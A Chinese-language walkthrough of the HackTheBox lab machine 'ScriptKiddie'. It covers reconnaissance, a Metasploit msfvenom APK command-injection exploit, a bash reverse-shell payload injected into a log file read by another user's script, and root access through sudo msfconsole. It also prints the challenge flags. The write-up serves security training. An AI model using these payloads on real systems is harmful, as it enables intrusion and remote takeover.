【渗透测试】hackthebox 靶场之 ScriptKiddie

0x01 信息收集

端口扫描：namp -A -sS -sV -sC 10.10.10.226

开放了 22 和 5000 端口（开启了 Werkzeug httpd 0.16.1 服务），使用浏览器打开 5000 端口

是一个黑客工具集，类似于 CTF 中在线 ping 工具存在命令执行漏洞的一样，这时候就是开始漏洞搜索了。

0x02 漏洞搜索且利用

Nmap 设置 127.0.0.1 扫描一下，发现 nmap 的版本是 7.80

Msf 搜一下漏洞：

searchsploit -c Nmap

发现并没有能利用的漏洞

搜索第二个工具，搜索 venom 时发现有个 apk 模板注入，我们可以利用这个试试看。（使用第三个在线工具也可以搜索 venom）

这时候就可以利用 msf 生成一个 apk 的马

use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection //使用此exp

发现只需要填写 kali 的 IP 地址和监听端口（4444）

set lhost 10.10.14.16 //设置本机IP地址exploit //生成木马

可知木马生成完毕，在/root/.msf4/local/路径下

然后开始监听 4444 端口

nc -lvvp 4444

然后把生成的 apk 木马上传到第二个工具

然后 getshell！我们升级一下 shell

SHELL=/bin/bash script -q /dev/null

然后在根目录拿到 user flag:

 ec09611a1d4cf67b831700b176aa70bc

0x03 提升权限

进入 home 目录，发现除了 kid 用户目录，还有一个 pwn 用户目录

查看 pwn 目录下的文件，发现有个 scanlosers.sh 的脚本文件，cat 文件内容

通过脚本文件的代码审计，发现它会一直扫描/home/kid/logs/hackers 日志文件的 IP 地址。

该脚本未对 hackers 文件传入的内容做过滤并且 hackers 文件是 kid 用户可编辑的，可以通过写入恶意代码，利用命令注入获得 pwn 用户的 shell，在 logs 目录下输入：（记住有空格）

echo  "  ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.16/1234 0>&1' #" >> hackers

1234 端口成功反弹 shell

Sudo -l 发现 msf 拥有 root 权限并且不需要密码

不多说，直接进入 msf

sudo /opt/metasploit-framework-6.0.9/msfconsole

在 root 目录下，拿到 root flag：

525a323ae46ff873d1a88e68fe6484a6